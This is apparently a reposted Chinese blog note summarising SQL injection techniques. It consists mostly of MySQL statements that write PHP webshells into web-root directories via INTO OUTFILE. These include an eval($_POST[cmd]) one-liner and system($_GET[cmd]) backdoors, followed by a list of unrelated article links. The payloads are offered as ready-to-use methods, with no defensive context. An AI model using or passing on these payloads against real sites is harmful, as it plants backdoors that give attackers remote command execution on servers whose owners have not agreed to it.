博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
SQL 注入自我总结
阅读量:6580 次
发布时间:2019-06-24

本文共 863 字,大约阅读时间需要 2 分钟。

hot3.png

早先是看过JHACKJ后台拿shell的方法:
Create TABLE st4dy (cmd text NOT NULL);
Insert INTO st4dy (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('<?php @system($_GET[cmd]);?>');
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------
而后在国外论坛上看到一老外的方法更简单:
1:select load_file('E:/xamp/www/st4dy.php');
2:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/st4dy.php'
然后访问网站目录:
3:写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/st4dy.php'
第三个是直接在SQL查询里导出一句话,必须要先知道网站的路

转载于:https://my.oschina.net/richardx/blog/54564

你可能感兴趣的文章
面试-1
查看>>
CentOS自动登录Gnome
查看>>
第一章,重点总结
查看>>
LeetCode - 49. Group Anagrams
查看>>
移动前端不得不了解的html5 head 头标签
查看>>
Tomcat 服务器性能优化
查看>>
【框架学习】ibatis DAO框架分析
查看>>
ZOJ 3640 Help Me Escape
查看>>
putty与emacs
查看>>
C#下实现的半角转与全角的互转
查看>>
PreparedStatement vs Statement
查看>>
使用texturePaker批量转化pvr为pn
查看>>
自我介绍
查看>>
截取指定网站Html编码
查看>>
作业一 统计软件简介与数据操作
查看>>
css布局
查看>>
HBase-java api 基本操作
查看>>
POJ2229 Sumsets
查看>>
在LINQ-TO-SQL中实现“级联删除”的方法
查看>>
lemur run PLSA
查看>>